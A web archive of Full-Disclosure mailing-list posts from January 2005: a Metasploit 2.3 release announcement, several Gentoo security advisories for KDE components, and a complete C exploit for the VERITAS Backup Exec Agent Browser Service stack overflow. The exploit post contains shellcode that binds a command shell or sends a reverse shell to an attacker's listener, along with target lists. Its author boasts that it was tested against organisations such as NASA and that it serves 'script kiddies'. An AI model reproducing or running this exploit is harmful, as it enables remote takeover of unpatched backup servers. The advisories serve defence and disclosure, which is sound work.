Major hints: spurious text destined to foil bayesian spam filters, subject
targeted to get you to open the mail ("what? I didn't order anything!").

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Metasploit Framework v2.3

From: H D Moore (fdlistdigitaloffense.net)
Date: Tue Jan 11 2005 - 05:21:57 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The Metasploit Framework is an advanced open-source exploit
development platform. The 2.3 release includes three user interfaces,
46 exploits and 68 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

Some highlights in this release:

- Complete overhaul of the Framework payload collection
    + Win32 ordinal-stagers are now included (92-byte reverse connect)
    + A handful of new sparc payloads have been added (sol, linux, bsd)
    + Reliability problems have been resolved in bsd, linux, and win32
    + New udp-based linux shell stagers and shell payloads
    + New size-optimized Mac OS X encoders and payloads

- Includes the win32 version of the Meterpreter
    + Dynamically load new features over the network w/o disk access
    + In-memory dll injection of the basic meterpreter shell
    + Current extensions include Fs, Process, Net, and Sys
    + Extensive documentation is available online:
      * http://metasploit.com/projects/Framework/docs/meterpreter.pdf

- Complete rewrite of the 'msfweb' user interface
    + Generate and encode stand-alone shellcode from the web interface
    + The interface is skinnable and includes three different themes
    + Streaming HTTP is used to provide a 100% web-based shell
    + Ability to set advanced options in the web interface

- Massive speed enhancements in msfconsole and msfweb
    + Snappier response and quicker load times on older systems
    + Optimizations made to various sort/search algorithms
    + Modules are no longer reloaded after each exploit

- New exploits
    + Microsoft WINS Service Memory Overwrite (MS04-045)
    + Samba trans2open() Buffer Overflow (Mac OS X)
    + 4D WebSTAR FTP Server Buffer Overflow (Mac OS X)
    + Veritas Name Service Registration Buffer Overflow
    + AOL Instant Messenger 'goaway' Buffer Overflow
    + IPSwitch IMail IMAPD 'delete' Buffer Overflow
    + Seattle Labs Mail Server POP3 Buffer Overflow
    + UoW IMAPD Buffer Overflow (sparc, ia32)
    + IRIX lpdsched Remote Command Execution
    + CDE dtspcd Buffer Overflow (Solaris)
    + IIS 4.0 ism.dll HTR Buffer Overflow
    + IIS w3who.dll ISAPI Buffer Overflow

This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.3.tar.gz
- Win32: http://metasploit.com/tools/framework-2.3.exe

Screen shots of the new release are online and available from:
  - http://metasploit.com/projects/Framework/screenshots.html

A demonstration of the new msfweb interface is running live from:
  - http://metasploit.com:55555/

Exploit modules designed for the 2.2 release should maintain
compatibility with 2.3. If you run into any problems using older
modules with this release, please let us know.

The Framework development team consists of four active members and a
handful of part-time contributors. Check out the 'Credits' exploit
module for a complete list of contributors.

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

Starting with the 2.2 release, it is now possible to perform a system-wide
installation of the Framework. Simply extract the tarball into the
directory of your choice and create symbolic links from the msf*
executables to a directory in the system path. Users may maintain their
own exploit module collections by placing them into ~/.msf/exploits/. If
you are interested in adding the Framework to a operating system
distribution, please drop us a line and we will gladly help with the
integration and testing process.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
- http://metasploit.com/projects/Framework/documentation.html

The Opcode Database has been refactored in order to support more granular
queries. The new version provides users with the ability to easily cross
reference specific opcode types, classes, and meta classes across one or
more modules for one or more operating system versions. This level of
granular control allows for a robust and flexible interface that can be
used to determine opcode portability. Aside from opcodes themselves, the
opcode database also contains detailed information about the segments,
imports, and exports that are associated with each module in the database.

A quick overview of the features included in the new database are:
  - Granular searching of opcodes of a specific type, class, and meta class.
  - Searching modules provided directly from Windbg's module list.
  - Cross referencing opcodes across various operating system version.
  - Detailed module information including segments, imports, and exports.

You can access the beta version of the new Opcode Database at:
- http://metasploit.com/opcode_beta.html

Enjoy!

- The Metasploit Framework Development Team
( hdm, spoonm, skape, and vlad902 )
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote Universal Exploit

From: class 101 (class101hat-squad.com)
Date: Tue Jan 11 2005 - 05:39:28 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Because k-otik are poor looser not respecting the publication of metasploit 2.3 , im forced to post my code.

/*
VERITAS Backup Exec v9.1.4691.SP1
v9.1.4691.SP0
v8.5.3572
Agent Browser Service, Remote Stack Overflow

Highly Critical

All credits to:

-iDEFENSE(discovery-www.iDEFENSE.com),
-Thor Doomen(iat-syscall[at]inbox.lv),
-H.D. Moore(scode-www.metasploit.com),
-Matt Miller(scode-www.hick.org)

ExtraNotes:

All my tests/debugs where a bit long (some days) firstly due to the big size
of Backup Exec and the unstability accross differents windows versions
to make working that IAT method with 100% success and the difficulty to debug it.
(As a recall, due to the 60 bytes only free, a tiny shellcode is send in first to scan
the recv function of benetns.exe and jump to the data submitted during the second send,
thanx syscall. Let's think large now. Imagine that you exploits the hole and you submit
the shellcode 5 minutes later, the service will hang on to death of course until a kill,
now imagine that you exploits the hole and you submit the shellcode too faslty for the,
computer processing, the shellcode can be missed, wont be executed again, sometimes yes/no, but really unstable.
Hopefully (or unfortunely for you admin :>) I'm here to optimize it and make it 100% working, universal,
stable whatever you want for the good fortune of script kiddies and to show what mean working to my good
friends ka-odick :>
Tries
Machine Bind / Rverse / Success

(2x) Win2k SP4 Server English 10 10 20
(1x) Win2k SP4 Pro English 5 5 10
(1x) WinXP SP1 Pro English 5 5 10
(1x) WinXP SP1a Pro English 5 5 10
(3x) Win2003 SP0 Server English 5 5 10
(1x) Win2003 SP0 Server Ita. 5 5 10
(1x) NT4 Server English. 5 5 10

= Universal

v0.1:
C code based on Thor Doomen's code posted at the metasploit mailing list,
excellent in the method, but super unstable to not say not working when used,
made some changes.

v0.2:
fix of the first big problem , the missed shellcode accross differents windows,
fixed by flooding benetns with more sends, timer really small, this is important.
padding 1 nop to the reverse shellcode as needed, else crash on reverse.

v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.

v0.4:
As a warning, this poc v0.4 as been tested working by an anonymous tester (never mentionned there)
on some organisations such nasa, states/edus, it's urgent to update 1 month after the advisory, sleepers.

Tips: -make sure that your ip is safe of null bytes in reverse mode.
      -make sure that you targets the good version of Backup Exec,
      else you crash it.
   -Backup Exec v10.0 is now available, get it at www.veritas.com.
   -Visit dfind.kd-team.com for a patched benetns.exe, quick solution
   for an urgent update. (extracted from the hotfix at www.veritas.com)
      Backup Exec 9.x is tested safe after replacing the .exe

Greetings:
   Nima Majidi
   Behrang Fouladi
   Pejman
   keystr0ke
   JGS
   DiabloHorn
   kimatrix
   NaV
   New Metasploit v2.3 (http://www.metasploit.com/)
   and all idlers of #n3ws on Eris Free Network.

by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have, no I'm not persian and you don't care where I come from.

04 January 2005
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
file://Matt Millers 'skape' shellcode.
"\x90" // pad needed their for me, if you get scode detection problems on slow connections,
file://try to add more NOP and make sure to update the memcpys later in the code.
"\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
"\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
"\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
"\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
"\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
"\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
"\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
"\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
"\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
"\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
"\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
"\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
"\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
"\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
"\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
"\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
"\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
"\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

char scode2[]=
file://HD.Moore Shellcode
file://"\x90" uncomment this if you have scode detection problem on slows connections or try more NOP,
file://but for me and some other guys its already fine like this.
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
char v85[]="\xFF\x38\x11\x40";
char esiold[]="\xB9\x08\x43\x01";

char talk[] =
"\x02\x00\x32\x00"
"\x90\x90\x90\x90"
"\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
"\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
"\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
"\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x00"
"1.1.1.1.1.1"
"\x00"
"\xEB\x80";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *os;
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
    if (strlen(argv[2])<7){usage(argv[0]);return -1;}
    if (argc==6)
{
        if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
   gip=inet_addr(argv[4])^(long)0x00000000;
  gport=htons(atoi(argv[5]))^(short)0x0000;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
  gip=inet_addr(argv[4])^(ULONG)0x00000000;
  gport=htons(atoi(argv[5]))^(USHORT)0x0000;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=6101;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1])==1) {memcpy(&talk[37], &v91sp0sp1, 4);memcpy(&talk[72], &esisp0sp1, 4);os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";}
else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, 4);os="Backup Exec v8.5.3572";}
if (argc==6)
{
  memcpy(&scode1[282], &gip, 4);
  memcpy(&scode1[289], &gport, 2);
  strcat(payload,scode1);
}
else strcat(payload,scode2);
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
  case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
  case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
  default:
  if(FD_ISSET(s,&mask))
  {
   printf("[+] connected, constructing the payload...\n");
   if (send(s,talk,sizeof(talk)-1,0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}

#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 2, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif

if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 3, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif

if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 4, the server is patched.\n");return -1;}

#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif

if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 5, the server is patched.\n");return -1;}

#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 6, the server is patched.\n");return -1;}

#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 7, the server is patched.\n");return -1;}

#ifdef WIN32
   Sleep(10);
#else
   Sleep(1/100);
#endif
   if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 8, the server is patched.\n");return -1;}
#ifdef WIN32
   Sleep(1000);
#else
   Sleep(1);
#endif
   printf("[+] size of payload: %d\n",(sizeof(talk)-1)+strlen(payload)*7);
   printf("[+] payload sent.\n");
   return 0;
  }
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}

void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_BXEC.exe Version VulnIP\n");
printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT\n");
printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT GayIP GayPORT\n");
printf("VERSION: \n");
printf(" [+] 1. Backup Exec v9.1.4691.SP1\n");
printf(" [+] 1. Backup Exec v9.1.4691.SP0\n");
printf(" [+] 2. Backup Exec v8.5.3572\n");
printf("TARGET: \n");
printf(" [+] . 2k3/2k/XP/NT4 universal (*)\n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================[0.4]========\n");
printf(" =================VERITAS Backup Exec 8.x/9.x=================\n");
printf(" =========Agent Browser Service, Remote Stack Overflow========\n");
printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
printf(" =============================================================\n");
printf(" \n");
}

-------------------------------------------------------------
class101
Hat-Squad.com
-------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [gentoo-announce] [ GLSA 200501-16 ] Konqueror: Java sandbox vulnerabilities

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Tue Jan 11 2005 - 07:06:17 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Konqueror: Java sandbox vulnerabilities
      Date: January 11, 2005
      Bugs: #72750
        ID: 200501-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Java sandbox environment in Konqueror can be bypassed to access
arbitrary packages, allowing untrusted Java applets to perform
unrestricted actions on the host system.

Background
==========

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. Konqueror is the KDE web browser and file
manager.

Affected packages
=================

Description
===========

Konqueror contains two errors that allow JavaScript scripts and Java
applets to have access to restricted Java classes.

Impact
======

A remote attacker could embed a malicious Java applet in a web page and
entice a victim to view it. This applet can then bypass security
restrictions and execute any command, or access any file with the
rights of the user running Konqueror.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable version for sparc.

References
==========

  [ 1 ] KDE Security Advisory: Konqueror Java Vulnerability
        http://www.kde.org/info/security/advisory-20041220-1.txt
  [ 2 ] CAN 2004-1145
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1145

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-16.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB489RzKC5hMHO6rkRAuSsAJoDI5y2ErPLTdHMPpxEUtgAOdu16ACgkGWn
LCHYqz+dbJSjorVXN6ZdfO8=
=ALvq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-16 ] Konqueror: Java sandbox vulnerabilities

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Tue Jan 11 2005 - 07:06:17 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  Severity: Normal
     Title: Konqueror: Java sandbox vulnerabilities
      Date: January 11, 2005
      Bugs: #72750
        ID: 200501-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Java sandbox environment in Konqueror can be bypassed to access
arbitrary packages, allowing untrusted Java applets to perform
unrestricted actions on the host system.

Background
==========

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. Konqueror is the KDE web browser and file
manager.

Affected packages
=================

Description
===========

Konqueror contains two errors that allow JavaScript scripts and Java
applets to have access to restricted Java classes.

Impact
======

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable version for sparc.

References
==========

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-16.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB489RzKC5hMHO6rkRAuSsAJoDI5y2ErPLTdHMPpxEUtgAOdu16ACgkGWn
LCHYqz+dbJSjorVXN6ZdfO8=
=ALvq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [gentoo-announce] [ GLSA 200501-18 ] KDE FTP KIOslave: Command injection

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Tue Jan 11 2005 - 07:33:11 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: KDE FTP KIOslave: Command injection
      Date: January 11, 2005
      Bugs: #73759
        ID: 200501-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The FTP KIOslave contains a bug allowing users to execute arbitrary FTP
commands.

Background
==========

KDE is a feature-rich graphical desktop environment for Linux and
Unix-like Operating Systems. KDE provided KIOslaves for many protocols
in the kdelibs package, one of them being FTP. These are used by KDE
applications such as Konqueror.

Affected packages
=================

Description
===========

The FTP KIOslave fails to properly parse URL-encoded newline
characters.

Impact
======

An attacker could exploit this to execute arbitrary FTP commands on the
server and due to similiarities between the FTP and the SMTP protocol,
this vulnerability also allows an attacker to connect to a SMTP server
and issue arbitrary commands, for example sending an email.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable 3.3.x version for sparc.

References
==========

  [ 1 ] KDE Security Advisory: ftp kioslave command injection
        http://www.kde.org/info/security/advisory-20050101-1.txt
  [ 2 ] CAN-2004-1165
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1165

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-18.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB49WbzKC5hMHO6rkRAlyhAJ9UAm9Z7haLxgOGHuR/2g0XyGV0dgCfbqn7
qnWuWPoBcG7Un+yg5GHdmA0=
=R8xh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-17 ] KPdf, KOffice: More vulnerabilities in included Xpdf

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Tue Jan 11 2005 - 07:18:11 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: KPdf, KOffice: More vulnerabilities in included Xpdf
      Date: January 11, 2005
      Bugs: #75203, #75204
        ID: 200501-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

KPdf and KOffice both include vulnerable Xpdf code to handle PDF files,
making them vulnerable to the execution of arbitrary code if a user is
enticed to view a malicious PDF file.

Background
==========

KPdf is a KDE-based PDF viewer included in the kdegraphics package.
KOffice is an integrated office suite for KDE.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-office/koffice < 1.3.5-r1 >= 1.3.5-r1
  2 kde-base/kdegraphics < 3.3.2-r1 >= 3.3.2-r1
                                                          *>= 3.2.3-r3
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

KPdf and KOffice both include Xpdf code to handle PDF files. Xpdf is
vulnerable to multiple new integer overflows, as described in GLSA
200412-24.

Impact
======

An attacker could entice a user to open a specially-crafted PDF file,
potentially resulting in the execution of arbitrary code with the
rights of the user running the affected utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All KPdf users should upgrade to the latest version of kdegraphics:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdegraphics

Note: There is currently no fixed stable 3.3.x version for sparc.

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose app-office/koffice

References
==========

  [ 1 ] GLSA 200412-24
        http://www.gentoo.org/security/en/glsa/glsa-200412-24.xml
  [ 2 ] CAN-2004-1125
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1125
  [ 3 ] KDE Security Advisory: kpdf Buffer Overflow Vulnerability
        http://kde.org/info/security/advisory-20041223-1.txt
  [ 4 ] KOffice XPDF Integer Overflow 2
